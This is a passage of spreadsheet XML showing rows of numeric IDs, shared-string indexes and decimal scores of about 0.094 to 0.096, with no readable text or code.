      <c r="C16209" s="2" t="s">
        <v>15645</v>
      </c>
      <c r="D16209" s="2">
        <v>1.0</v>
      </c>
      <c r="E16209" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16209" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16210" ht="15.75" customHeight="1">
      <c r="A16210" s="1">
        <v>17849.0</v>
      </c>
      <c r="B16210" s="2">
        <v>5.0983842E7</v>
      </c>
      <c r="C16210" s="2" t="s">
        <v>15646</v>
      </c>
      <c r="D16210" s="2">
        <v>1.0</v>
      </c>
      <c r="E16210" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16210" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16211" ht="15.75" customHeight="1">
      <c r="A16211" s="1">
        <v>18266.0</v>
      </c>
      <c r="B16211" s="2">
        <v>5.2195659E7</v>
      </c>
      <c r="C16211" s="2" t="s">
        <v>15647</v>
      </c>
      <c r="D16211" s="2">
        <v>1.0</v>
      </c>
      <c r="E16211" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16211" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16212" ht="15.75" customHeight="1">
      <c r="A16212" s="1">
        <v>18934.0</v>
      </c>
      <c r="B16212" s="2">
        <v>5.4280762E7</v>
      </c>
      <c r="C16212" s="2" t="s">
        <v>15648</v>
      </c>
      <c r="D16212" s="2">
        <v>1.0</v>
      </c>
      <c r="E16212" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16212" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16213" ht="15.75" customHeight="1">
      <c r="A16213" s="1">
        <v>19191.0</v>
      </c>
      <c r="B16213" s="2">
        <v>5.4980965E7</v>
      </c>
      <c r="C16213" s="2" t="s">
        <v>15649</v>
      </c>
      <c r="D16213" s="2">
        <v>1.0</v>
      </c>
      <c r="E16213" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16213" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16214" ht="15.75" customHeight="1">
      <c r="A16214" s="1">
        <v>19193.0</v>
      </c>
      <c r="B16214" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C16214" s="2" t="s">
        <v>15650</v>
      </c>
      <c r="D16214" s="2">
        <v>1.0</v>
      </c>
      <c r="E16214" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16214" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16215" ht="15.75" customHeight="1">
      <c r="A16215" s="1">
        <v>19626.0</v>
      </c>
      <c r="B16215" s="2">
        <v>5.6260831E7</v>
      </c>
      <c r="C16215" s="2" t="s">
        <v>15651</v>
      </c>
      <c r="D16215" s="2">
        <v>1.0</v>
      </c>
      <c r="E16215" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16215" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16216" ht="15.75" customHeight="1">
      <c r="A16216" s="1">
        <v>19905.0</v>
      </c>
      <c r="B16216" s="2">
        <v>5.7340819E7</v>
      </c>
      <c r="C16216" s="2" t="s">
        <v>15652</v>
      </c>
      <c r="D16216" s="2">
        <v>1.0</v>
      </c>
      <c r="E16216" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16216" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16217" ht="15.75" customHeight="1">
      <c r="A16217" s="1">
        <v>20593.0</v>
      </c>
      <c r="B16217" s="2">
        <v>1.3813734E7</v>
      </c>
      <c r="C16217" s="2" t="s">
        <v>15653</v>
      </c>
      <c r="D16217" s="2">
        <v>1.0</v>
      </c>
      <c r="E16217" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16217" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16218" ht="15.75" customHeight="1">
      <c r="A16218" s="1">
        <v>20785.0</v>
      </c>
      <c r="B16218" s="2">
        <v>1.5091677E7</v>
      </c>
      <c r="C16218" s="2" t="s">
        <v>15654</v>
      </c>
      <c r="D16218" s="2">
        <v>1.0</v>
      </c>
      <c r="E16218" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16218" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16219" ht="15.75" customHeight="1">
      <c r="A16219" s="1">
        <v>21057.0</v>
      </c>
      <c r="B16219" s="2">
        <v>1.7793624E7</v>
      </c>
      <c r="C16219" s="2" t="s">
        <v>15655</v>
      </c>
      <c r="D16219" s="2">
        <v>1.0</v>
      </c>
      <c r="E16219" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16219" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16220" ht="15.75" customHeight="1">
      <c r="A16220" s="1">
        <v>21415.0</v>
      </c>
      <c r="B16220" s="2">
        <v>2.1985099E7</v>
      </c>
      <c r="C16220" s="2" t="s">
        <v>15656</v>
      </c>
      <c r="D16220" s="2">
        <v>1.0</v>
      </c>
      <c r="E16220" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16220" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16221" ht="15.75" customHeight="1">
      <c r="A16221" s="1">
        <v>21582.0</v>
      </c>
      <c r="B16221" s="2">
        <v>2.3883491E7</v>
      </c>
      <c r="C16221" s="2" t="s">
        <v>15657</v>
      </c>
      <c r="D16221" s="2">
        <v>1.0</v>
      </c>
      <c r="E16221" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16221" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16222" ht="15.75" customHeight="1">
      <c r="A16222" s="1">
        <v>21808.0</v>
      </c>
      <c r="B16222" s="2">
        <v>2.6764641E7</v>
      </c>
      <c r="C16222" s="2" t="s">
        <v>15658</v>
      </c>
      <c r="D16222" s="2">
        <v>1.0</v>
      </c>
      <c r="E16222" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16222" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16223" ht="15.75" customHeight="1">
      <c r="A16223" s="1">
        <v>22596.0</v>
      </c>
      <c r="B16223" s="2">
        <v>3.9406695E7</v>
      </c>
      <c r="C16223" s="2" t="s">
        <v>15659</v>
      </c>
      <c r="D16223" s="2">
        <v>1.0</v>
      </c>
      <c r="E16223" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16223" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16224" ht="15.75" customHeight="1">
      <c r="A16224" s="1">
        <v>23258.0</v>
      </c>
      <c r="B16224" s="2">
        <v>5.3168255E7</v>
      </c>
      <c r="C16224" s="2" t="s">
        <v>15660</v>
      </c>
      <c r="D16224" s="2">
        <v>1.0</v>
      </c>
      <c r="E16224" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16224" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16225" ht="15.75" customHeight="1">
      <c r="A16225" s="1">
        <v>23756.0</v>
      </c>
      <c r="B16225" s="2">
        <v>7473133.0</v>
      </c>
      <c r="C16225" s="2" t="s">
        <v>15661</v>
      </c>
      <c r="D16225" s="2">
        <v>1.0</v>
      </c>
      <c r="E16225" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16225" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16226" ht="15.75" customHeight="1">
      <c r="A16226" s="1">
        <v>25018.0</v>
      </c>
      <c r="B16226" s="2">
        <v>1.2782006E7</v>
      </c>
      <c r="C16226" s="2" t="s">
        <v>15662</v>
      </c>
      <c r="D16226" s="2">
        <v>1.0</v>
      </c>
      <c r="E16226" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16226" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16227" ht="15.75" customHeight="1">
      <c r="A16227" s="1">
        <v>25699.0</v>
      </c>
      <c r="B16227" s="2">
        <v>1.4529134E7</v>
      </c>
      <c r="C16227" s="2" t="s">
        <v>15663</v>
      </c>
      <c r="D16227" s="2">
        <v>1.0</v>
      </c>
      <c r="E16227" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16227" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16228" ht="15.75" customHeight="1">
      <c r="A16228" s="1">
        <v>25744.0</v>
      </c>
      <c r="B16228" s="2">
        <v>1.4594622E7</v>
      </c>
      <c r="C16228" s="2" t="s">
        <v>15664</v>
      </c>
      <c r="D16228" s="2">
        <v>1.0</v>
      </c>
      <c r="E16228" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16228" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16229" ht="15.75" customHeight="1">
      <c r="A16229" s="1">
        <v>25861.0</v>
      </c>
      <c r="B16229" s="2">
        <v>1.4879318E7</v>
      </c>
      <c r="C16229" s="2" t="s">
        <v>15665</v>
      </c>
      <c r="D16229" s="2">
        <v>1.0</v>
      </c>
      <c r="E16229" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16229" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16230" ht="15.75" customHeight="1">
      <c r="A16230" s="1">
        <v>26751.0</v>
      </c>
      <c r="B16230" s="2">
        <v>1.839517E7</v>
      </c>
      <c r="C16230" s="2" t="s">
        <v>15666</v>
      </c>
      <c r="D16230" s="2">
        <v>1.0</v>
      </c>
      <c r="E16230" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16230" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16231" ht="15.75" customHeight="1">
      <c r="A16231" s="1">
        <v>27450.0</v>
      </c>
      <c r="B16231" s="2">
        <v>2.1985098E7</v>
      </c>
      <c r="C16231" s="2" t="s">
        <v>15656</v>
      </c>
      <c r="D16231" s="2">
        <v>1.0</v>
      </c>
      <c r="E16231" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16231" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16232" ht="15.75" customHeight="1">
      <c r="A16232" s="1">
        <v>29298.0</v>
      </c>
      <c r="B16232" s="2">
        <v>3.1201294E7</v>
      </c>
      <c r="C16232" s="2" t="s">
        <v>15667</v>
      </c>
      <c r="D16232" s="2">
        <v>1.0</v>
      </c>
      <c r="E16232" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16232" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16233" ht="15.75" customHeight="1">
      <c r="A16233" s="1">
        <v>29799.0</v>
      </c>
      <c r="B16233" s="2">
        <v>3.5113688E7</v>
      </c>
      <c r="C16233" s="2" t="s">
        <v>15668</v>
      </c>
      <c r="D16233" s="2">
        <v>1.0</v>
      </c>
      <c r="E16233" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16233" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16234" ht="15.75" customHeight="1">
      <c r="A16234" s="1">
        <v>30419.0</v>
      </c>
      <c r="B16234" s="2">
        <v>3.8878898E7</v>
      </c>
      <c r="C16234" s="2" t="s">
        <v>15669</v>
      </c>
      <c r="D16234" s="2">
        <v>1.0</v>
      </c>
      <c r="E16234" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16234" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16235" ht="15.75" customHeight="1">
      <c r="A16235" s="1">
        <v>30845.0</v>
      </c>
      <c r="B16235" s="2">
        <v>4.5839637E7</v>
      </c>
      <c r="C16235" s="2" t="s">
        <v>15670</v>
      </c>
      <c r="D16235" s="2">
        <v>1.0</v>
      </c>
      <c r="E16235" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16235" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16236" ht="15.75" customHeight="1">
      <c r="A16236" s="1">
        <v>31139.0</v>
      </c>
      <c r="B16236" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C16236" s="2" t="s">
        <v>15671</v>
      </c>
      <c r="D16236" s="2">
        <v>1.0</v>
      </c>
      <c r="E16236" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16236" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16237" ht="15.75" customHeight="1">
      <c r="A16237" s="1">
        <v>32356.0</v>
      </c>
      <c r="B16237" s="2">
        <v>5.5939907E7</v>
      </c>
      <c r="C16237" s="2" t="s">
        <v>15672</v>
      </c>
      <c r="D16237" s="2">
        <v>1.0</v>
      </c>
      <c r="E16237" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16237" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16238" ht="15.75" customHeight="1">
      <c r="A16238" s="1">
        <v>32650.0</v>
      </c>
      <c r="B16238" s="2">
        <v>5874993.0</v>
      </c>
      <c r="C16238" s="2" t="s">
        <v>15673</v>
      </c>
      <c r="D16238" s="2">
        <v>1.0</v>
      </c>
      <c r="E16238" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16238" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16239" ht="15.75" customHeight="1">
      <c r="A16239" s="1">
        <v>32704.0</v>
      </c>
      <c r="B16239" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C16239" s="2" t="s">
        <v>15674</v>
      </c>
      <c r="D16239" s="2">
        <v>1.0</v>
      </c>
      <c r="E16239" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16239" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16240" ht="15.75" customHeight="1">
      <c r="A16240" s="1">
        <v>32756.0</v>
      </c>
      <c r="B16240" s="2">
        <v>6053862.0</v>
      </c>
      <c r="C16240" s="2" t="s">
        <v>15663</v>
      </c>
      <c r="D16240" s="2">
        <v>1.0</v>
      </c>
      <c r="E16240" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16240" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16241" ht="15.75" customHeight="1">
      <c r="A16241" s="1">
        <v>32897.0</v>
      </c>
      <c r="B16241" s="2">
        <v>6395460.0</v>
      </c>
      <c r="C16241" s="2" t="s">
        <v>15675</v>
      </c>
      <c r="D16241" s="2">
        <v>1.0</v>
      </c>
      <c r="E16241" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16241" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16242" ht="15.75" customHeight="1">
      <c r="A16242" s="1">
        <v>32997.0</v>
      </c>
      <c r="B16242" s="2">
        <v>6615466.0</v>
      </c>
      <c r="C16242" s="2" t="s">
        <v>15676</v>
      </c>
      <c r="D16242" s="2">
        <v>1.0</v>
      </c>
      <c r="E16242" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16242" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16243" ht="15.75" customHeight="1">
      <c r="A16243" s="1">
        <v>34131.0</v>
      </c>
      <c r="B16243" s="2">
        <v>9779015.0</v>
      </c>
      <c r="C16243" s="2" t="s">
        <v>15664</v>
      </c>
      <c r="D16243" s="2">
        <v>1.0</v>
      </c>
      <c r="E16243" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16243" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16244" ht="15.75" customHeight="1">
      <c r="A16244" s="1">
        <v>7544.0</v>
      </c>
      <c r="B16244" s="2">
        <v>5.1480486E7</v>
      </c>
      <c r="C16244" s="2" t="s">
        <v>15677</v>
      </c>
      <c r="D16244" s="2">
        <v>1.0</v>
      </c>
      <c r="E16244" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16244" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="16245" ht="15.75" customHeight="1">
      <c r="A16245" s="1">
        <v>11649.0</v>
      </c>
      <c r="B16245" s="2">
        <v>2.3245535E7</v>
      </c>
      <c r="C16245" s="2" t="s">
        <v>15678</v>
      </c>
      <c r="D16245" s="2">
        <v>1.0</v>
      </c>
      <c r="E16245" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16245" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="16246" ht="15.75" customHeight="1">
      <c r="A16246" s="1">
        <v>14352.0</v>
      </c>
      <c r="B16246" s="2">
        <v>3.8908145E7</v>
      </c>
      <c r="C16246" s="2" t="s">
        <v>15679</v>
      </c>
      <c r="D16246" s="2">
        <v>1.0</v>
      </c>
      <c r="E16246" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16246" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="16247" ht="15.75" customHeight="1">
      <c r="A16247" s="1">
        <v>21911.0</v>
      </c>
      <c r="B16247" s="2">
        <v>2.8122952E7</v>
      </c>
      <c r="C16247" s="2" t="s">
        <v>15680</v>
      </c>
      <c r="D16247" s="2">
        <v>1.0</v>
      </c>
      <c r="E16247" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16247" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="16248" ht="15.75" customHeight="1">
      <c r="A16248" s="1">
        <v>23826.0</v>
      </c>
      <c r="B16248" s="2">
        <v>8001452.0</v>
      </c>
      <c r="C16248" s="2" t="s">
        <v>15610</v>
      </c>
      <c r="D16248" s="2">
        <v>1.0</v>
      </c>
      <c r="E16248" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16248" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="16249" ht="15.75" customHeight="1">
      <c r="A16249" s="1">
        <v>32966.0</v>
      </c>
      <c r="B16249" s="2">
        <v>6548490.0</v>
      </c>
      <c r="C16249" s="2" t="s">
        <v>15681</v>
      </c>
      <c r="D16249" s="2">
        <v>1.0</v>
      </c>
      <c r="E16249" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16249" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="16250" ht="15.75" customHeight="1">
      <c r="A16250" s="1">
        <v>19876.0</v>
      </c>
      <c r="B16250" s="2">
        <v>5.7249885E7</v>
      </c>
      <c r="C16250" s="2" t="s">
        <v>15682</v>
      </c>
      <c r="D16250" s="2">
        <v>1.0</v>
      </c>
      <c r="E16250" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16250" s="2">
        <v>0.09538784067085955</v>
      </c>
    </row>
    <row r="16251" ht="15.75" customHeight="1">
      <c r="A16251" s="1">
        <v>17613.0</v>
      </c>
      <c r="B16251" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C16251" s="2" t="s">
        <v>15683</v>
      </c>
      <c r="D16251" s="2">
        <v>1.0</v>
      </c>
      <c r="E16251" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16251" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="16252" ht="15.75" customHeight="1">
      <c r="A16252" s="1">
        <v>28184.0</v>
      </c>
      <c r="B16252" s="2">
        <v>2.5006496E7</v>
      </c>
      <c r="C16252" s="2" t="s">
        <v>15684</v>
      </c>
      <c r="D16252" s="2">
        <v>1.0</v>
      </c>
      <c r="E16252" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16252" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="16253" ht="15.75" customHeight="1">
      <c r="A16253" s="1">
        <v>12390.0</v>
      </c>
      <c r="B16253" s="2">
        <v>2.8881494E7</v>
      </c>
      <c r="C16253" s="2" t="s">
        <v>15685</v>
      </c>
      <c r="D16253" s="2">
        <v>1.0</v>
      </c>
      <c r="E16253" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16253" s="2">
        <v>0.09482758620689655</v>
      </c>
    </row>
    <row r="16254" ht="15.75" customHeight="1">
      <c r="A16254" s="1">
        <v>266.0</v>
      </c>
      <c r="B16254" s="2">
        <v>1.5165212E7</v>
      </c>
      <c r="C16254" s="2" t="s">
        <v>15686</v>
      </c>
      <c r="D16254" s="2">
        <v>1.0</v>
      </c>
      <c r="E16254" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16254" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="16255" ht="15.75" customHeight="1">
      <c r="A16255" s="1">
        <v>1964.0</v>
      </c>
      <c r="B16255" s="2">
        <v>3.0331335E7</v>
      </c>
      <c r="C16255" s="2" t="s">
        <v>15687</v>
      </c>
      <c r="D16255" s="2">
        <v>1.0</v>
      </c>
      <c r="E16255" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16255" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="16256" ht="15.75" customHeight="1">
      <c r="A16256" s="1">
        <v>5880.0</v>
      </c>
      <c r="B16256" s="2">
        <v>4.7071447E7</v>
      </c>
      <c r="C16256" s="2" t="s">
        <v>15688</v>
      </c>
      <c r="D16256" s="2">
        <v>1.0</v>
      </c>
      <c r="E16256" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16256" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="16257" ht="15.75" customHeight="1">
      <c r="A16257" s="1">
        <v>6186.0</v>
      </c>
      <c r="B16257" s="2">
        <v>4.7908068E7</v>
      </c>
      <c r="C16257" s="2" t="s">
        <v>15689</v>
      </c>
      <c r="D16257" s="2">
        <v>1.0</v>
      </c>
      <c r="E16257" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16257" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="16258" ht="15.75" customHeight="1">
      <c r="A16258" s="1">
        <v>13015.0</v>
      </c>
      <c r="B16258" s="2">
        <v>3.290204E7</v>
      </c>
      <c r="C16258" s="2" t="s">
        <v>15690</v>
      </c>
      <c r="D16258" s="2">
        <v>1.0</v>
      </c>
      <c r="E16258" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16258" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="16259" ht="15.75" customHeight="1">
      <c r="A16259" s="1">
        <v>14820.0</v>
      </c>
      <c r="B16259" s="2">
        <v>4.0958096E7</v>
      </c>
      <c r="C16259" s="2" t="s">
        <v>15691</v>
      </c>
      <c r="D16259" s="2">
        <v>1.0</v>
      </c>
      <c r="E16259" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16259" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="16260" ht="15.75" customHeight="1">
      <c r="A16260" s="1">
        <v>17683.0</v>
      </c>
      <c r="B16260" s="2">
        <v>5.0496741E7</v>
      </c>
      <c r="C16260" s="2" t="s">
        <v>15692</v>
      </c>
      <c r="D16260" s="2">
        <v>1.0</v>
      </c>
      <c r="E16260" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16260" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="16261" ht="15.75" customHeight="1">
      <c r="A16261" s="1">
        <v>31801.0</v>
      </c>
      <c r="B16261" s="2">
        <v>5.241881E7</v>
      </c>
      <c r="C16261" s="2" t="s">
        <v>15693</v>
      </c>
      <c r="D16261" s="2">
        <v>1.0</v>
      </c>
      <c r="E16261" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16261" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="16262" ht="15.75" customHeight="1">
      <c r="A16262" s="1">
        <v>14550.0</v>
      </c>
      <c r="B16262" s="2">
        <v>3.9949022E7</v>
      </c>
      <c r="C16262" s="2" t="s">
        <v>15694</v>
      </c>
      <c r="D16262" s="2">
        <v>1.0</v>
      </c>
      <c r="E16262" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16262" s="2">
        <v>0.09454191033138401</v>
      </c>
    </row>
    <row r="16263" ht="15.75" customHeight="1">
      <c r="A16263" s="1">
        <v>26709.0</v>
      </c>
      <c r="B16263" s="2">
        <v>1.8188935E7</v>
      </c>
      <c r="C16263" s="2" t="s">
        <v>15695</v>
      </c>
      <c r="D16263" s="2">
        <v>1.0</v>
      </c>
      <c r="E16263" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16263" s="2">
        <v>0.09454191033138401</v>
      </c>
    </row>
    <row r="16264" ht="15.75" customHeight="1">
      <c r="A16264" s="1">
        <v>3077.0</v>
      </c>
      <c r="B16264" s="2">
        <v>3.6554836E7</v>
      </c>
      <c r="C16264" s="2" t="s">
        <v>15696</v>
      </c>
      <c r="D16264" s="2">
        <v>1.0</v>
      </c>
      <c r="E16264" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16264" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="16265" ht="15.75" customHeight="1">
      <c r="A16265" s="1">
        <v>4632.0</v>
      </c>
      <c r="B16265" s="2">
        <v>4.3001838E7</v>
      </c>
      <c r="C16265" s="2" t="s">
        <v>15697</v>
      </c>
      <c r="D16265" s="2">
        <v>1.0</v>
      </c>
      <c r="E16265" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16265" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="16266" ht="15.75" customHeight="1">
      <c r="A16266" s="1">
        <v>6013.0</v>
      </c>
      <c r="B16266" s="2">
        <v>4.7473531E7</v>
      </c>
      <c r="C16266" s="2" t="s">
        <v>15698</v>
      </c>
      <c r="D16266" s="2">
        <v>1.0</v>
      </c>
      <c r="E16266" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16266" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="16267" ht="15.75" customHeight="1">
      <c r="A16267" s="1">
        <v>6809.0</v>
      </c>
      <c r="B16267" s="2">
        <v>4.9525029E7</v>
      </c>
      <c r="C16267" s="2" t="s">
        <v>15699</v>
      </c>
      <c r="D16267" s="2">
        <v>1.0</v>
      </c>
      <c r="E16267" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16267" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="16268" ht="15.75" customHeight="1">
      <c r="A16268" s="1">
        <v>2753.0</v>
      </c>
      <c r="B16268" s="2">
        <v>3.5100614E7</v>
      </c>
      <c r="C16268" s="2" t="s">
        <v>15700</v>
      </c>
      <c r="D16268" s="2">
        <v>1.0</v>
      </c>
      <c r="E16268" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16268" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="16269" ht="15.75" customHeight="1">
      <c r="A16269" s="1">
        <v>3238.0</v>
      </c>
      <c r="B16269" s="2">
        <v>3.7349685E7</v>
      </c>
      <c r="C16269" s="2" t="s">
        <v>15701</v>
      </c>
      <c r="D16269" s="2">
        <v>1.0</v>
      </c>
      <c r="E16269" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16269" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="16270" ht="15.75" customHeight="1">
      <c r="A16270" s="1">
        <v>19094.0</v>
      </c>
      <c r="B16270" s="2">
        <v>5.4675715E7</v>
      </c>
      <c r="C16270" s="2" t="s">
        <v>15702</v>
      </c>
      <c r="D16270" s="2">
        <v>1.0</v>
      </c>
      <c r="E16270" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16270" s="2">
        <v>0.09424603174603172</v>
      </c>
    </row>
    <row r="16271" ht="15.75" customHeight="1">
      <c r="A16271" s="1">
        <v>17701.0</v>
      </c>
      <c r="B16271" s="2">
        <v>5.0572759E7</v>
      </c>
      <c r="C16271" s="2" t="s">
        <v>15703</v>
      </c>
      <c r="D16271" s="2">
        <v>1.0</v>
      </c>
      <c r="E16271" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16271" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="16272" ht="15.75" customHeight="1">
      <c r="A16272" s="1">
        <v>1327.0</v>
      </c>
      <c r="B16272" s="2">
        <v>2.5780445E7</v>
      </c>
      <c r="C16272" s="2" t="s">
        <v>15704</v>
      </c>
      <c r="D16272" s="2">
        <v>1.0</v>
      </c>
      <c r="E16272" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16272" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16273" ht="15.75" customHeight="1">
      <c r="A16273" s="1">
        <v>3092.0</v>
      </c>
      <c r="B16273" s="2">
        <v>3.6684961E7</v>
      </c>
      <c r="C16273" s="2" t="s">
        <v>15705</v>
      </c>
      <c r="D16273" s="2">
        <v>1.0</v>
      </c>
      <c r="E16273" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16273" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16274" ht="15.75" customHeight="1">
      <c r="A16274" s="1">
        <v>4520.0</v>
      </c>
      <c r="B16274" s="2">
        <v>4.2616392E7</v>
      </c>
      <c r="C16274" s="2" t="s">
        <v>15706</v>
      </c>
      <c r="D16274" s="2">
        <v>1.0</v>
      </c>
      <c r="E16274" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16274" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16275" ht="15.75" customHeight="1">
      <c r="A16275" s="1">
        <v>4761.0</v>
      </c>
      <c r="B16275" s="2">
        <v>4.3413151E7</v>
      </c>
      <c r="C16275" s="2" t="s">
        <v>10384</v>
      </c>
      <c r="D16275" s="2">
        <v>1.0</v>
      </c>
      <c r="E16275" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16275" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="16276" ht="15.75" customHeight="1">
      <c r="A16276" s="1">
        <v>7332.0</v>
      </c>
      <c r="B16276" s="2">
        <v>5.0924377E7</v>
      </c>
      <c r="C16276" s="2" t="s">
